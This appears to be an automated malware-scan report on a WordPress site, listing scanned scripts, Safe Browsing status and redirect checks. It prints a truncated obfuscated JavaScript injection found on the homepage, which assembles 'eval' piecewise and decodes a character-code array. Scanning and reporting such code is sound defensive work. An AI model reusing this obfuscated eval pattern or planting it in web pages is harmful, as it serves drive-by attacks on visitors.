Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theevilweevil.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://theevilweevil.com/ | 200 OK Content-Length: 30334 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122 Antivirus reports:
http://theevilweevil.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/plugins/sharebar/js/sharebar.js?ver=3.5 | 200 OK Content-Length: 1802 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/js_cookie.js?ver=1.0 | 200 OK Content-Length: 636 Content-Type: application/javascript | clean |
http://theevilweevil.com/?ver=pprjq1 | 200 OK Content-Length: 2814 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://theevilweevil.com/test404page.js | 200 OK Content-Length: 9058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/cufon-yui.js | 200 OK Content-Length: 39451 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/qtobject.js | 200 OK Content-Length: 2354 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/combinebottom.js | 200 OK Content-Length: 291006 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theevilweevil.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 00:47:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: __utmfr=228; expires=Fri, 02-Jan-2015 00:47:36 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: theevilweevil.com
Referer: http://www.google.com/search?q=theevilweevil.com
Result:
The result is similar to the first query. There are no suspicious redirects found.